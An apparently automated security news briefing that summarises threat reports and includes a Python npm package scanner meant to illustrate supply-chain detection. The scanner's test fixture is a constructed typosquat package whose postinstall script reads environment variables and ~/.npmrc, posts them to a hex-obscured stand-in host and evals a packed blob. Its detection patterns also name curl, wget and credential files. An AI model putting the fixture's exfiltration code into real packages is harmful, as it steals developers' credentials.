Good morning. This is your security briefing for Friday, January 09, 2026, covering seven critical developments in the threat landscape. All attribution is by the article authors, and all article analysis is automated.
Trellix has uncovered CrazyHunter, a Go-based ransomware family that emerged in mid-2024 and targets healthcare organizations in Taiwan. The operators run double extortion, abuse a vulnerable Zemana driver (a bring-your-own-vulnerable-driver technique) for privilege escalation, use Group Policy Objects for lateral movement, and encrypt files with ChaCha20.
Joe Security has analyzed a phishing campaign that impersonates DocuSign and delivers malware through a fake document platform. Victims download a malicious executable, signed with a valid code-signing certificate, that layers several evasion techniques to avoid detection.
MHaggis has released PackageInferno, an open-source, Docker-based tool that scans packages from the npm software supply chain for malicious patterns and vulnerabilities. It applies YARA rules to flag obfuscated code, credential theft, unexpected network calls, and typosquatting, and presents the results in a Streamlit dashboard.
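To make the four detection categories concrete, here is an added example written for this briefing; it is not PackageInferno's code and does not use its YARA rules. It scans an in-memory npm package (a constructed `package.json` plus one constructed JavaScript file, both assumed here for illustration) with plain regular expressions for obfuscation, credential access and network calls, inspects lifecycle install hooks, checks the package name against an assumed list of popular package names using an edit distance that counts adjacent transpositions, and flags long high-entropy string literals as a further obfuscation signal.

```python
"""Heuristic npm package scanner (constructed example, not PackageInferno's YARA logic)."""
import json
import math
import re

# Assumed list of well-known package names used for the typosquat comparison.
POPULAR_PACKAGES = ["lodash", "express", "react", "axios", "chalk", "request", "moment"]

# Illustrative patterns per category; real rule sets are far larger.
PATTERNS = {
    "obfuscation": [r"\beval\s*\(", r"new\s+Function\s*\(", r"String\.fromCharCode",
                    r"(?:\\x[0-9a-fA-F]{2}){8,}"],          # long run of hex escapes
    "credential_theft": [r"process\.env", r"\.npmrc", r"\.aws[/\\]credentials", r"id_rsa"],
    "network": [r"\bhttps?\.request\s*\(", r"\bfetch\s*\(", r"\bnet\.connect\s*\(",
                r"\bnew\s+WebSocket\s*\("],
    "install_hook_exec": [r"\bcurl\b", r"\bwget\b", r"node\s+-e\b", r"powershell", r"\bsh\s+-c\b"],
}
COMPILED = {cat: [re.compile(p) for p in pats] for cat, pats in PATTERNS.items()}
STRING_LITERAL = re.compile(r"""(["'])((?:\\.|(?!\1).)*)\1""")


def edit_distance(a, b):
    """Optimal string alignment distance: insert, delete, substitute and
    adjacent transposition each cost 1, so 'lodahs' is 1 edit from 'lodash'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_candidates(name, popular=POPULAR_PACKAGES, max_distance=1):
    """Popular names within max_distance edits of name, excluding an exact match."""
    return [p for p in popular if p != name and edit_distance(name, p) <= max_distance]


def shannon_entropy(s):
    """Bits per character; random base64 text scores close to 6, English text near 4."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def high_entropy_strings(js, min_len=40, threshold=4.5):
    """String literals long and random-looking enough to be packed payloads."""
    return [m.group(2) for m in STRING_LITERAL.finditer(js)
            if len(m.group(2)) >= min_len and shannon_entropy(m.group(2)) >= threshold]


def scan_package(files):
    """files maps relative path -> content. Returns (category, path, detail) findings."""
    findings = []
    manifest = json.loads(files["package.json"])
    name = manifest.get("name", "")
    for target in typosquat_candidates(name):
        findings.append(("typosquat", "package.json", f"{name!r} is 1 edit from {target!r}"))
    for hook in ("preinstall", "install", "postinstall"):
        cmd = manifest.get("scripts", {}).get(hook)
        if cmd:
            findings.append(("install_hook", "package.json", f"{hook}: {cmd}"))
            for rx in COMPILED["install_hook_exec"]:
                if rx.search(cmd):
                    findings.append(("install_hook_exec", "package.json", rx.pattern))
    for path, content in files.items():
        if not path.endswith(".js"):
            continue
        for category in ("obfuscation", "credential_theft", "network"):
            for rx in COMPILED[category]:
                if rx.search(content):
                    findings.append((category, path, rx.pattern))
        for s in high_entropy_strings(content):
            findings.append(("obfuscation", path, f"high-entropy literal ({len(s)} chars)"))
    return findings


def categories(findings):
    return sorted({f[0] for f in findings})


# Constructed malicious package: typosquat name, postinstall hook, env/.npmrc exfiltration,
# hex-escaped hostname and a base64-looking blob fed to eval().
SAMPLE_PACKAGE = {
    "package.json": json.dumps({"name": "lodahs", "version": "4.17.21",
                                "scripts": {"postinstall": "node -e \"require('./setup.js')\""}}),
    "setup.js": r"""
const https = require('https');
const fs = require('fs');
const os = require('os');
const payload = JSON.stringify({ env: process.env,
  npmrc: fs.readFileSync(os.homedir() + '/.npmrc', 'utf8') });
const host = "\x63\x6f\x6c\x6c\x65\x63\x74\x6f\x72\x2e\x65\x78\x61\x6d\x70\x6c\x65";
const blob = "zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA9876543210+/";
const req = https.request({ host, path: '/upload', method: 'POST' });
req.end(payload);
eval(Buffer.from(blob, 'base64').toString());
""",
}

if __name__ == "__main__":
    for finding in scan_package(SAMPLE_PACKAGE):
        print(finding)
```

Treat the output as triage input rather than a verdict: `process.env` and `https.request` appear in plenty of legitimate packages, so the signal is the combination of a typosquat-distance name, a lifecycle hook that executes code, credential file reads, and an outbound request in the same package, which is also why a rule-based scanner reports per-category hits and leaves the scoring to the analyst.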
Amazon Web Services has shown how AWS Network Firewall's active threat defense uses its MadPot honeypot network to block threats in real time. The system detected an attack campaign exploiting CVE-2025-48703 in Control Web Panel and had protective rules deployed within 30 minutes of identifying the threat.
De Rechtspraak reports that a defendant has been sentenced to seven years in prison for computer hacking involving unauthorized access to port systems. The perpetrator used a malware-infected USB drive to install a backdoor, aiming to manipulate gate controls and RFID systems so that drug shipments could be imported undetected.
CloudSEK has identified RustyWater, a new Rust-based remote access trojan that the Muddy Water APT group is deploying in spear-phishing campaigns. The implant targets diplomatic, maritime, financial, and telecommunications organizations across the Middle East and features asynchronous command-and-control, anti-analysis mechanisms, and modular post-compromise capabilities built for long-term surveillance.
Huntress has intercepted an attack on VMware ESXi environments that began with compromised SonicWall VPN credentials in December 2025. The threat actors deployed an ESXi exploit toolkit that may have been developed as a zero-day more than a year before VMware became aware of it, intending to deploy ransomware; Huntress stopped the attack before they could.